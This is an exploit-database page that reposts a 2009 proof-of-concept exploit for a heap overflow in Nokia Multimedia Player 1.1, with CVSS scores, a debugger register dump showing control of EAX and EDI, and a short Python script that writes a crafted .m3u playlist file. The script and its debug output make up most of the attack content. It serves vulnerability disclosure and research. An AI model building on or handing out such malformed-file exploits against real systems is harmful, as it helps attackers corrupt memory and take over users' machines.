Nokia Multimedia Player v1.1 .m3u Heap Overflow PoC exploit

2009.02.04
Credit: Dark-Coders
Risk: High
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Nokia Multimedia Player version 1.1 .m3u Heap Overflow PoC exploit # by 0in aka zer0in from Dark-Coders Group! [0in.email[at]gmail.com] / 0in[at]dark-coders.pl] # http://www.Dark-Coders.pl # Special thx to doctor ( for together analyse this shi*) and sun8hclf ( for tell me.. "to unicode.") # Greetings to: Die,m4r1usz,cOndemned (;> ?),joker,chomzee,TBH # Nokia Multimedia Player is a element of Nokia PC Suite packet. # DOWNLOAD:http://europe.nokia.com/A4144905 # Vuln: # This is heap overflow vuln, we can control EAX & EDI registers # (on my Windows XP sp3) with UNICODE chars... # DEBUG: # "Access violation when reading [00130013]" # EAX 00130013 <- ! # EDX 00000000 # EBX 00970000 # ESP 0012F96C # EBP 0012FB8C # ESI 00AD26B0 # EDI 00900011 <- ! # EIP 7C910CB0 ntdll.7C910CB0 #!/usr/bin/python eax="\x13\x13" # eax : 00130013 edi="\x11\x90" # edi : 00900011 buf="F"*261 buf+=edi+eax buf+="B"*235 file_name="spl0.m3u" ce=buf f=open(file_name,'w') f.write(ce) f.close() print 'PoC created!'


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top